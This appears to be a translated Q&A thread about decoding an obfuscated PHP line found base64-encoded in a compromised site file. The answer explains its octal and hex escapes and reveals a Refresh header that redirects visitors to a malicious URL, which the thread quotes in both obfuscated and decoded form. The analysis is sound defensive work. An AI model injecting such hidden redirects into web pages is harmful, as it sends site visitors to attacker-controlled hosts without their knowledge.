Что это за кодировка?

Question

Я нашел некоторый кодированный в base64 текст в скомпрометированном php-файле. Когда я декодировал строку base64, это была следующая директива:

header("R\145\x66resh\072\x20\x32\x35\x3b\x20\x75r\x6c\075\"\x68\164\164\x70\x3a\057\057\146\143b\x61\162\x63\145\154on\141\144\157\x64\157\143\x6fm.\x69\x6e\x66\157\057uk\"");

Какая кодировка это строка URL? Сначала я думал hex, затем ascii, но его переменной длины. Я сделал Google, но безрезультатно. Может ли кто-нибудь указать мне правильное направление?

Answer 1

Предупреждение:

Ниже приведен URL-адрес взломанного веб-сайта.

Посещение сайта приносит пользу злоумышленнику в финансовом отношении и может нанести вред вашему компьютеру.

Строка означает

Refresh: 25; url="http://fcbarcelonadodocom.info/uk"

\145 - это кодовая точка 145 (восьмеричная), \x66 - это кодовая точка 66 (шестнадцатеричная).

Проверять:

1. казнить

   php
   

2. Тип

   <?php
       echo "R\145\x66resh\072\x20\x32\x35\x3b\x20\x75r\x6c\075\"\x68\164\164\x70\x3a\057\057\146\143b\x61\162\x63\145\154on\141\144\157\x64\157\143\x6fm.\x69\x6e\x66\157\057uk\"";
   ?>
   

3. Нажмите Ctrl + D.